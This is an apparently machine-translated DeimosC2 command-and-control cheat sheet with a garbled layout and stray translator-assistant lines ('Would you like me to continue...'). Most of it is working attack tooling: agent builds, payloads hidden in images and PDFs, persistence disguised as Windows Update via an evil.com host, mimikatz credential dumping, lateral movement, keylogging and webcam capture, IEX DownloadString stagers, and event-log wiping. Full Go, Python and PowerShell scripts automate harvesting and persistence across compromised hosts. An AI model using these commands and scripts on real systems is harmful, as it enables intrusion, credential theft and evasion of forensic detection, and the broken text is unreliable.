Framework DeimosC2 Cheat Sheet
Panoramica
DeimosC2 è un framework di comando e controllo post-sfruttamento basato su Golang, progettato per operazioni di red team e test di penetrazione. Costruito con principi di architettura moderna, DeimosC2 si concentra sulla compatibilità multipiattaforma, comunicazioni sicure e capacità complete di post-sfruttamento, mantenendo un ingombro leggero e tecniche avanzate di evasione.
⚠️ Avvertenza: Questo strumento è destinato esclusivamente a test di penetrazione autorizzati ed esercitazioni di red team. Assicurati di avere l’autorizzazione prima di utilizzarlo su qualsiasi target.
Installazione
Prerequisiti
# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrcInstallazione da GitHub
# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server
# Build the agent
go build -o deimosc2-agent ./cmd/agent
# Make executables
chmod +x deimosc2-server deimosc2-agentInstallazione Docker
# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build Docker image
docker build -t deimosc2 .
# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2Compilazione Multipiattaforma
# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agentUtilizzo Base
Avvio del Server
# Start DeimosC2 server with default settings
./deimosc2-server
# Start with custom configuration
./deimosc2-server -config config.json
# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
# Start in debug mode
./deimosc2-server -debugFile di Configurazione
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}Accesso all’Interfaccia Web
# Access DeimosC2 web interface
http://localhost:8080
# HTTPS access
https://your-domain.com:443
# Default credentials (configurable)
Username: admin
Password: SecurePassword123!Distribuzione dell’Agente
Esecuzione Base dell’Agente
# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20Opzioni di Configurazione dell’Agente
# Command line options
./deimosc2-agent -h
Options:
-server string C2 server URL (required)
-interval int Check-in interval in seconds (default: 30)
-jitter int Jitter percentage (default: 10)
-user-agent string Custom User-Agent string
-proxy string Proxy URL (http://proxy:port)
-cert string Custom CA certificate file
-insecure Skip TLS certificate verification
-debug Enable debug loggingDistribuzione Steganografica
# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080
# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdfInstallazione Servizio (Windows)
# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"
# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"Comando e Controllo
Gestione Agente
# List active agents
agents list
# Get agent information
agents info [agent_id]
# Execute command on agent
agents exec [agent_id] "whoami"
# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
# Kill agent
agents kill [agent_id]
# Rename agent
agents rename [agent_id] [new_name]Operazioni su File
# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
# List directory contents
ls [agent_id] C:\Users\Administrator\Documents
# Change directory
cd [agent_id] C:\Windows\System32
# Create directory
mkdir [agent_id] C:\Windows\Temp\data
# Remove file
rm [agent_id] C:\Windows\Temp\payload.exeGestione Processi
# List processes
ps [agent_id]
# Kill process
kill [agent_id] [pid]
# Start process
start [agent_id] notepad.exe
# Process injection
inject [agent_id] [pid] [shellcode_file]
# Memory dump
memdump [agent_id] [pid] output.dmpOperazioni di Rete
# Network discovery
discover [agent_id] 192.168.1.0/24
# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
# ARP scan
arpscan [agent_id] 192.168.1.0/24
# Network interfaces
ifconfig [agent_id]
# Routing table
route [agent_id]
# Network connections
netstat [agent_id]Funzionalità Avanzate
Meccanismi di Persistenza
# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"Escalation dei Privilegi
# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
# Token manipulation (Windows)
elevate token [agent_id] [target_pid]
# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
# SUID exploitation (Linux)
elevate suid [agent_id]
# Kernel exploits
elevate kernel [agent_id] [exploit_name]Movimento Laterale
# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"Operazioni su Credenziali
Would you like me to continue with the remaining sections?```bash
Dump credentials (Windows)
creds dump [agent_id]
Mimikatz execution (Windows)
creds mimikatz [agent_id] “sekurlsa::logonpasswords”
SAM dump (Windows)
creds sam [agent_id]
LSA secrets (Windows)
creds lsa [agent_id]
Browser credentials
creds browser [agent_id]
SSH keys (Linux/macOS)
creds ssh [agent_id]
Keychain dump (macOS)
creds keychain [agent_id]
**Pre-engagement setup**: Configurare il server e compilare gli agenti prima dell'engagementbash
SOCKS proxy
pivot socks [agent_id] 1080
Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
HTTP tunnel
pivot http [agent_id] 8080
DNS tunnel
pivot dns [agent_id] tunnel.example.com
**Agent management**: Utilizzare nomi di agenti descrittivi e organizzare per retebash
Screenshot
screenshot [agent_id]
Keylogger
keylog start [agent_id] keylog stop [agent_id] keylog dump [agent_id]
Webcam capture
webcam [agent_id]
Microphone recording
microphone [agent_id] 60
Clipboard monitoring
clipboard [agent_id]
File search
search [agent_id] C:\Users *.docx
Registry search
regsearch [agent_id] HKLM password
**Communication protocols**: Stabilire canali di comunicazione C2 sicurigo
package main
import ( “bytes” “encoding/json” “fmt” “io/ioutil” “net/http” “time” )
type DeimosClient struct \\{ BaseURL string Username string Password string HTTPClient *http.Client Token string \\}
type Agent struct \\{
ID string json:"id"
Hostname string json:"hostname"
Username string json:"username"
OS string json:"os"
IP string json:"ip"
Status string json:"status"
\\}
type Command struct \\{
AgentID string json:"agent_id"
Command string json:"command"
Args string json:"args"
\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\{ return &DeimosClient\\{ BaseURL: baseURL, Username: username, Password: password, HTTPClient: &http.Client\\{Timeout: 30 * time.Second\\}, \\} \\}
func (c *DeimosClient) Authenticate() error \\{ authData := map[string]string\\{ “username”: c.Username, “password”: c.Password, \\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\{ req, _ := http.NewRequest(“GET”, c.BaseURL+“/api/agents”, nil) req.Header.Set(“Authorization”, “Bearer “+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\{ cmdData := Command\\{ AgentID: agentID, Command: command, \\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\{ commands := []string\\{ “whoami”, “hostname”, “pwd”, “ps”, “ifconfig”, “netstat -an”, “uname -a”, \\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\{ persistenceCommands := []string\\{ “persist registry HKCU “Software\Microsoft\Windows\CurrentVersion\Run” “WindowsUpdate” “C:\Windows\Temp\agent.exe"", “persist schtask “SystemUpdate” “C:\Windows\Temp\agent.exe” “ONLOGON"", “persist service “WindowsUpdateService” “C:\Windows\Temp\agent.exe"", \\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}\\}
func main() \\{ client := NewDeimosClient(“http://192.168.1.100:8080”, “admin”, “SecurePassword123!”)
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}\\}
**Data handling**: Implementare la raccolta e l'archiviazione sicura dei datipython
#!/usr/bin/env python3
DeimosC2 Python automation script
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip(’/’) self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)def main(): client = DeimosClient(“http://192.168.1.100:8080”, “admin”, “SecurePassword123!”)
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)if name == “main”: main()
If you can provide the missing text sections, I'll be happy to translate them for you.```powershell
# DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\\\{
param(
[string]$ServerURL = "http://192.168.1.100:8080",
[string]$Username = "admin",
[string]$Password = "SecurePassword123!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\\\}
# Execute automation
Invoke-DeimosAutomationIntegration with Other Tools
Metasploit Integration
# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
runEmpire Integration
# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
executeCobalt Strike Integration
# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team serverOperational Security
Communication Security
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.keyTraffic Obfuscation
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30Anti-Forensics
# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"
# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"Troubleshooting
Common Issues
# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues
# Go build issues
go mod tidy
go clean -cache
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodesDebug Mode
# Enable debug logging
./deimosc2-server -debug
# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
# Check network connectivity
telnet 192.168.1.100 8080Best Practices
Operational Planning
- Pre-engagement setup: Configure server and compile agents before engagement
- Agent management: Use descriptive agent names and organize by network
- Communication protocols: Establish secure C2 communication channels
- Data handling: Implement secure data collection and storage
- Cleanup procedures: Plan for artifact removal and agent cleanup
Security Considerations
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channelsDocumentation and Reporting
# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution preventionResources
- DeimosC2 GitHub Repository
- DeimosC2 Documentation
- Go Programming Language
- MITRE ATT&CK Framework
- [SANS Red Team Operations](https://www.sans.org/cyber-security-courses/red-team-operations-adversary-emulation/*Questo cheat sheet fornisce un riferimento completo per l’utilizzo del framework DeimosC2. Assicurati sempre di avere l’autorizzazione appropriata prima di condurre operazioni di red team o test di penetrazione.*